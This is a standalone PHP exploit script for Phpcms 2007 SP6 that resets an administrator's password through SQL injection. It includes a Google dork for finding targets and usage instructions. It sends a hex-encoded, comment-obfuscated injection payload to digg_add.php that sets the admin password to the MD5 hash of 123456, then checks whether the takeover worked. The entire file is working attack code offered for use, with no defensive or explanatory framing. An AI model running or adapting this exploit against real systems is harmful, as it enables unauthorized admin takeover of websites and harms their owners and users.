#!/usr/bin/php
<?php

print_r('
+---------------------------------------------------------------------------+
Phpcms 2007 SP6 reset admin password exploit
by puret_t
mail: puretot at gmail dot com
team:http://www.wolvez.org
dork: "Powered by Phpcms 2007"
+---------------------------------------------------------------------------+
');
/**
* works regardless of php.ini settings
*/
if ($argc < 4) {
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path user
host:      target server (ip/hostname)
path:      path to phpcms
user:      admin login name
Example:
php '.$argv[0].' localhost /phpcms/ admin
+---------------------------------------------------------------------------+
');
exit;
}

error_reporting(7);
ini_set('max_execution_time', 0);

$host = $argv[1];
$path = $argv[2];
$user = $argv[3];

$url = 'http://'.$host.$path.'member/member.php?username='.$user;

send();

if (strpos(file_get_contents($url), 'puret_t') !== false)
exit("Expoilt Success!\nAdmin New Password:\t123456\n");
else
exit("Exploit Failed!\n");

function send()
{
global $host, $path, $user;

$cmd = 'digg_mod=admin,(SELECT/**/1/**/AS/**/credit_on,0x'.bin2hex('1\',password=\'e10adc3949ba59abbe56e057f20f883e\',email=\'puret_t\',showemail=1 WHERE username=\''.$user.'\'#').'/**/AS/**/credit,0x'.bin2hex('\' UNION SELECT 1#').'/**/AS/**/editor)/**/AS/**/ryat/**/LIMIT/**/1%23&id=1&con=6';

$message = "POST ".$path."digg/digg_add.php  HTTP/1.1\r\n";
$message .= "Accept: */*\r\n";
$message .= "Accept-Language: zh-cn\r\n";
$message .= "Content-Type: application/x-www-form-urlencoded\r\n";
$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
$message .= "CLIENT-IP: ".time()."\r\n";
$message .= "Host: $host\r\n";
$message .= "Content-Length: ".strlen($cmd)."\r\n";
$message .= "Connection: Close\r\n\r\n";
$message .= $cmd;

$fp = fsockopen($host, 80);
fputs($fp, $message);

$resp = '';

while ($fp && !feof($fp))
$resp .= fread($fp, 1024);

return $resp;
}

?>